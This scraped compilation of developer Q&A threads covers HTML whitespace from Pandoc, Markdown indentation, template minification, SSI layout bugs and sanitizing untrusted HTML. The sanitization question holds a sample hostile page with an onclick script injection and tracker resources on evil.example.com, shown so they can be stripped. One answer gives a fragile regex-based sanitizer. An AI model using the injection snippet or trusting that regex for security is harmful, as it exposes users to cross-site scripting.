I use Hakyll to generate some documentation and I noticed that it has a weird way of closing the HTML tags in the code it generates.
There was a page where they said that you must generate the markup as they do, or the layout of your page will be broken under some conditions, but I can't find it now.
I created a small test page (code below) which has one red layer with the "normal" HTML markup, and a yellow layer with markup similar to what hakyll generates.
I can't see any diference in Firefox between the two divs.
Can anybody explain if what they say is true?
<html>
<body>
<!-- NORMAL STYLE -->
<div style="background: red">
<p>Make available the code from the library you added to your application. Again, the way to do this varies between languages (from adding import statements in python to adding a jar to the classpath for java)</p>
<p>Create an instance of the client and, in your code, make calls to it through this instance's methods.</p>
</div>
<!-- HAKYLL STYLE -->
<div style="background: yellow"
><p
>Make available the code from the library you added to your application. Again, the way to do this varies between languages (from adding import statements in python to adding a jar to the classpath for java)</p
><p
>Create an instance of the client and, in your code, make calls to it through this instance's methods.</p
></div
>
</body>
<html>
It's actually pandoc that's generating the HTML code. There's a good explanation in the Pandoc issue tracker:
http://code.google.com/p/pandoc/issues/detail?id=134
The reason is
because any whitespace (including newline and tabs) between HTML tags will cause the
browser to insert a space character between those elements. It is far easier on the
machine logic to leave these spaces out, because then you don't need to think about
the possible ways that the HTML text formatting could be messing with the browser adding
extra spaces.
There are times when stripping the white space between two tags will make a difference, particularly when dealing with inline elements.
I ran tidy over it and it fixed the unusual linebreaks.
Related
I have an unusual situation. I am in a transitional state for a website that will eventually be a wiki-like site that uses markdown files to generate documentation. However, for our phase 0 demonstration to upper management, I need to use HTML instead of markdown for advanced layouts. This leads to large portions of the Markdown files being HTML. Generally speaking, this is working fine, but sometimes the "4 spaces means code block" "feature" of markdown means that instead of rendering the page, I just get the HTML pasted to the screen in a <pre>.
So, my question is, how can I turn off the "4 spaces means code block" thing? IMO, this is an idiotic design in the first place, but it's really screwing with my current project!
For example:
I have a banner
<div class="banner detail">
<div class="banner-inner">
...
</div>
</div>
On some pages, this renders exactly as expected. On others, it spits out the "banner-inner" div and everything inside it to the page. Hell, even convincing this editor to display that code snippet instead of processing it took 5 minutes of trial and error poking...
Please, some one help me turn off or get around (without simply not using indenting...) this "feature"!!
Sadly, whether this "feature" can be turned off is relegated to a customization question for the specific software package in use.
On the bright side, I was able to eventually determine that the specific problem I was having was caused by the engine interpreting invalid HTML code (ie, missing a closing tag) as code to be displayed rather than processed. So in the end, seeing this happen actually tended to mean that I had a bug to fix.
I have a handlebars template file that I'd like to minify. I found a couple questions that were related to my issue on StackOverflow, but nothing exactly like it that had an answer. My issue is that spaces that are within the templated values are getting removed when I run the code through a minifier.
Example:
I have this line of code in my template file:
<div>{{{displayName}}} - {{cost}}</div>
When I use the un-minified file to render the page, I get entries like:
ProductName - $5.50
which is what I want. After running the template through an html minifier, my template line now looks like this:
<div>{{{displayName}}}-{{cost}}</div>
and the entries on the rendered page look like:
ProductName-$5.50
Not optimal. Now, I understand that I could just run through the template and put in non-breaking spaces into all the places where I'd like spaces to be. Nice. Simple. Easy... relatively.
But.
A secondary, and larger, issue comes into play (and what's the point of going through and putting in all those non-breaking spaces into my template file to avoid this situation with the html minifier if there are more issues) when I'm selectively adding attributes or classes to a given html element.
Example:
I also have lines in my template files that look like:
<div class="paymentMethod{{#if paymentSelected}} active{{/if}}">
On the condition where my template (handlebars) variable "paymentSelected" is true the html shows as:
After minification, however the minified template file contains:
<div class="paymentMethod{{#if amazonAndPaypal}}active{{/if}}">
which makes the html on the page show as:
which, consequently, messes up all of my css and javascript because there is now one unrecognized class on the element instead of two correct classes.
Again, there is a way of getting around this. I could just place all of the class definitions into the template variables. So, my new template would be:
<div class="{{#if amazonAndPaypal}}paymentMethod active{{else}}paymentMethod{{/if}}">
This kind of goes against the idea of removing redundancy though. So I don't like it. And this is a fairly simple case, with only two possible classes.
I'm sure there are more possibilities for hassle with html minification of template files, but I think I've shown my point.
Now, all of that explanation comes to my question:
Is there a tool out there that will minify html but ignore spaces that are between opening and closing template tags? For me, those spaces are similar to the spaces between words. I don't want all the spaces between the words of a sentence removed any more than I want the spaces within my template tags to be removed.
I also went searching for a generic sed solution, but didn't find anything in that direction either.
Could you just use &nbsp;?
<div class="paymentMethod{{#if paymentSelected}} active{{/if}}">
Okay, so I figured out a better option, and this may be incredibly obvious to some but I'm pretty new to the whole Handlebars gig.
A better solution to minifying the html templates would be to precompile the templates and to then minify the resulting javascript. This way, I also get the savings of no compilation time on the browser side and (because I'm using Handlebars as my templating language) loading the smaller runtime script.
Granted, this solution doesn't explicitly answer the question I posed, it does solve the ultimate problem I'm trying to solve, which is to minimize the page-load time on a browser by doing everything I can to the necessary assets prior to a browser downloading them.
To take away some page loading time, where can I find something to remove spaces between html tags? Without me having to go through each one and remove them myself
Like so:
<body>
<p>Lot's of space</p>
</body>
<body><p>No space</p></body>
I found this site. But it leaves one space between tags. But I don't want any.
Be careful that you have some idea of what is happening or you will corrupt the integrity of your documents. A fully minified code sample removes all comments and all white space characters not necessary for syntactical purposes.
In other words this example of HTML:
<p>Some content
<strong>is strong</strong>
and
<em>emphasized</em>
in this paragraph.</p>
When fully minified becomes:
<p>Somecontent<strong>isstrong</strong>and<em>emphasized</em>inthisparagraph.</p>
In that case the corruption to the content is obvious as all the words are colliding into each other. What is not obvious is the space buffering content and tags and the spaces between tags not adjacent to other content. All white space characters outside of tags in a HTML document are text nodes in the DOM and removing DOM nodes without careful consideration is possibly harmful.
Furthermore, you also have to ensure that your HTML minifier is not corrupting any inline JavaScript or CSS code. Investigate these conditions carefully when looking at the different options available.
Here is one that I wrote which may be helpful to you as it minifies markup tags in a way that is fully recursive to a beautified state using an automated pretty-print application.
http://prettydiff.com/?m=minify&html
Any other HTML minifier without this rule will work.
Google listed me this one:
http://www.willpeavy.com/minifier/
I'm developing web application with Smarty template engine. It has function {strip}, which replaces all new lines, tabs, spaces... in the template. So you can write your code with many new lines and spaces. But output will be in single line.
I have finally perfected my web page and it works perfectly in every browser.
However, when I abstracted out the header and footer contents into server side includes, the layout changes marginally in Firefox/Opera/Safari, but in IE, the layout changes makes the page look broken.
Are there any known issues that could cause the layout to change when using SSIs? Quite frankly, I'm surprised that using a SSI would have an effect like this. I am using HTML5 tags, the modernizr js library, and the page validates if any of that matters.
EDIT: I fixed my problem by changing what code was abstracted (I simply abstracted one parent tag further than before). HOWEVER, I am still eager to know exactly why this bug happened in the first place. Is there someone out there who could shed light on what in particular could cause this?
Chances are that its not SSI that's causing any issues.
It's entirely possible that there are newlines in the HTML code causing IE to insert extraneous spaces, causing the layout to break.
Also, be sure you separated the code correctly when you moved pieces to the includes. It is probably easiest to check this by running your HTML through a validator.
I was having a similar problem and fixed as follows.
i had something like this:
<div>
<include>
</div>
and fixed it by changing it to this:
<div><include></div>
The issue ending up being a bug with how the server parsed the HTML and with HTML5 tags. For whatever reason, when I added one extra tag set to the SSI, it worked.
My original include looked like this:
<header>
<!--#Include File="/includes/header.shtm"-->
</header>
with the included file being:
<nav>
<ul>
<li>Home</li>
<li>Products</li>
<li>About</li>
<li>Contact</li>
</ul>
</nav>
But when I took all of the HTML5 tags out of the include, as shown below, everything worked as normal. I'm not sure if this is an issue with an old version of apache or what, but doing this fixed everything.
<header>
<nav>
<!--#Include File="/includes/header.shtm"-->
</nav>
</header>
It may be a file encoding problem with UTF-8, inserting BOM characters at the beginning of the included file. My solution was to save the include file as UTF-8 without the BOM signature.
I noticed having the include statement just after the body tag showed the extra space, but adding (any?) html tag around the include statement hides it. I'm guessing the browser ignores the characters once they're "inside" the body instead of the beginning.
My particular situation involved Visual Studio, but it shows up with a mix of editors. See also
How can I avoid the blank space when using PHP include?
Force Visual Studio (2010) to save all files in UTF-8
UTF-8 without BOM
This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s);)();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .Net library, which:
is open-source
is actively maintained
doesn't have the problems like Microsoft Anti-XSS library,
Is unit tested with the
OWASP XSS Filter Evasion Cheat Sheet
is special built for this (in contrast to HTML Agility Pack, which is a parser)
Also on NuGet
I am sensing you would definately need a parser that can generate a XML/DOM source so that you can apply fiter on it to produce what you are looking for.
See if HtmlTidy or Mozilla or HtmlCleaner parsers can help. HtmlCleaner has lot of configurable options which you might also want to look at. Specifically the transform section that allows you to skip the tags you doesn't require.
I would suggest using another approach. If you control the method in which the HTML is viewed I would remove all threats by using a HTML render that doesn't have a ECMA script engine, or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine. One that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the javascript would just be ignored then.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem, i took some time facing it because there are a lot of things we want to remove from user imput, and even if i do a long list of things to be removed, latter on HTML can evolve and my list would have some holes.
Nonetheless i want users to input some simple things like bold, italic, paragraphs... prety simple.
No doubts the allowed things list is shorter and html can change latter on, that wont make holes on my list unless html stops supports this simple things.
So start thinking otherwise, say just what you allow, with great pain because i'm not an expert on regex (so please some regex people correct me here or improve) i coded this expression and its working form me even before HTML5 arrive.
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags, feel free to add some.
this is a startpoint and thats why some regex people should improve to remove also the attributes, like onclick
if i do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other stuff will be removed but the corresponding closing tags will remain, and after all we don't want those tags removed we just want to remove the tag attributes.
maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
am i right? can this be composed into a single pass?
we still have no relation between tags (opening/closing), no great deal till now.
Can the attribute remove be write to remove all not from a white lists? (possibly yes).
a last problem.. when removing tags like script the content remains, its desirable when removing font but not script, well we can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
that will remove certain tags and its content.. but its a black list, meaning you have to keep an eye on it in case html changes.
note: all with "gi"
edit:
joined all the above on this function
String.prototype.sanitizeHTML=function (white,black) {
if (!white) white="b|i|p|br";//allowed tags
if (!black) black="script|object|embed";//complete remove tags
e=new RegExp("(<("+black+")[^>]*>.*</\\2>|(?!<[/]?("+white+")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
return this.replace(e,"");
}
-black list -> complete remove tag and content
-white list -> retain tags
other tags are removed but tag content is retained
all attributes of white list tag's (the remaining ones) are removed
still there is place for a white list of attributes (not implemented above) because if i want to preserve IMG then the src must stay... and what about tracking images?